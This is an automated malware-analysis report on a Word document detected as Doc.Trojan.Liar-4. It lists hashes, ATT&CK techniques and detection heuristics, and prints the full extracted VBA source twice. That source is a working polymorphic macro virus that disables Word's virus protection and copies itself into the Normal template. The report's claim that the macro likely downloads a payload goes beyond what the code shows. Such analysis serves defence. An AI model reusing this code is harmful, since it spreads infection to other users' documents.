Office (OLE) malware analysis — malicious · 7589ebf630012d9f

MALICIOUS

Office (OLE)

30.0 KB Created: 2000-10-07 18:35:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: 661eae52cb3436fbd8a86f89f3cfa902 SHA-1: a80f67de952f0ba4a236abd2338f47bfc52c1801 SHA-256: 7589ebf630012d9f14eb98c4adfc3f2133aa1ce4ee147bb5d23181f97e0270a5

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros, specifically a Document_Open macro, which is a common technique for initial execution. The macro appears to be obfuscated and attempts to modify the Normal template or the active document, likely to download and execute a secondary payload. The ClamAV detection 'Doc.Trojan.Liar-4' further confirms its malicious nature.

Heuristics 3

ClamAV: Doc.Trojan.Liar-4 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Liar-4
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2029 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2029 bytes
SHA-256: `35c4d17d3ae5e15feddb68dc07ae671964702b36a9f983c6d60951d872628242`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" ' Class.Beg to differ Private Sub Document_Open() ' Dim v(200): Options.VirusProtection = (Rnd * 0): Options.SaveNormalPrompt = (Rnd * 0) ' Set a = MacroContainer.VBProject: Set ab = a.VBComponents(1) ' Set abc = ab.CodeModule: Set s = NormalTemplate: t = Chr(39) ' If MacroContainer = s Then Set s = ActiveDocument ' Set nh = s.VBProject.VBComponents(1).CodeModule: li = abc.countoflines: y = 100 + Int(Rnd * 50) ' For i = 1 To li: jc = "": d = Int(Rnd * 3): p = InStr(abc.Lines(i, 1), t) ' If p = 1 And li > y Then ' d = 1: GoTo n_ ' End If ' l = UCase(Left(abc.Lines(i, 1), (p - 1))) ' For o = 1 To Len(l): f = Mid(l, o, 1) ' If Asc(f) < 90 And Asc(f) > 65 Then f = Chr(Asc(f) + Int(Rnd * 2) * 32) ' v(i) = v(i) & f: Next o ' For j = 1 To Int(75 - (Rnd * 20)): jc = jc & Chr(255 - Int(Rnd * 100)): Next j ' v(i) = v(i) & t & jc ' If d = 2 Then v(i) = v(i) & vbCr & t & jc ' vc = vc & v(i) & vbCr ' n_: ' Next i ' If nh.countoflines < (1 + 1 + 2) Then ' nh.deletelines 1, nh.countoflines: nh.addfromstring vc: nh.deletelines nh.countoflines, 1 ' If s = ActiveDocument Then ActiveDocument.SaveAs ActiveDocument.FullName ' If Day(Now()) = 16 Then beg_to_differ ' End If ' End Sub ' Private Sub beg_to_differ() ' beg = "do you see what I see?" & vbCr ' beg = beg & "do you hear what I hear?" & vbCr ' beg = beg & "do you feel what I feel?" & vbCr ' beg = beg & "do you ever care?" & vbCr ' beg = beg & "I...beg to differ!" & vbCr ' beg = beg & "beg to differ!" & vbCr & vbCr ' beg = beg & "jackie twoflower/Lz0NT/MVT" ' MsgBox beg, 0, "class.beg to differ" ' End Sub ' Rem Dedicated to Darkman/29A '

SHA-256: 35c4d17d3ae5e15feddb68dc07ae671964702b36a9f983c6d60951d872628242

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
' Class.Beg to differ

Private Sub Document_Open() '

Dim v(200): Options.VirusProtection = (Rnd * 0): Options.SaveNormalPrompt = (Rnd * 0) '

Set a = MacroContainer.VBProject: Set ab = a.VBComponents(1) '

Set abc = ab.CodeModule: Set s = NormalTemplate: t = Chr(39) '

If MacroContainer = s Then Set s = ActiveDocument '

Set nh = s.VBProject.VBComponents(1).CodeModule: li = abc.countoflines: y = 100 + Int(Rnd * 50) '

For i = 1 To li: jc = "": d = Int(Rnd * 3): p = InStr(abc.Lines(i, 1), t) '

If p = 1 And li > y Then '

d = 1: GoTo n_ '

End If '

l = UCase(Left(abc.Lines(i, 1), (p - 1))) '

For o = 1 To Len(l): f = Mid(l, o, 1) '

If Asc(f) < 90 And Asc(f) > 65 Then f = Chr(Asc(f) + Int(Rnd * 2) * 32) '

v(i) = v(i) & f: Next o '

For j = 1 To Int(75 - (Rnd * 20)): jc = jc & Chr(255 - Int(Rnd * 100)): Next j '

v(i) = v(i) & t & jc '

If d = 2 Then v(i) = v(i) & vbCr & t & jc '

vc = vc & v(i) & vbCr '

n_: '

Next i '

If nh.countoflines < (1 + 1 + 2) Then '

nh.deletelines 1, nh.countoflines: nh.addfromstring vc: nh.deletelines nh.countoflines, 1 '

If s = ActiveDocument Then ActiveDocument.SaveAs ActiveDocument.FullName '

If Day(Now()) = 16 Then beg_to_differ '

End If '

End Sub '

Private Sub beg_to_differ() '

beg = "do you see what I see?" & vbCr '

beg = beg & "do you hear what I hear?" & vbCr '

beg = beg & "do you feel what I feel?" & vbCr '

beg = beg & "do you ever care?" & vbCr '

beg = beg & "I...beg to differ!" & vbCr '

beg = beg & "beg to differ!" & vbCr & vbCr '

beg = beg & "jackie twoflower/Lz0NT/MVT" '

MsgBox beg, 0, "class.beg to differ" '

End Sub '

Rem Dedicated to Darkman/29A '

Open this report in the interactive analyzer, or submit your own file for analysis.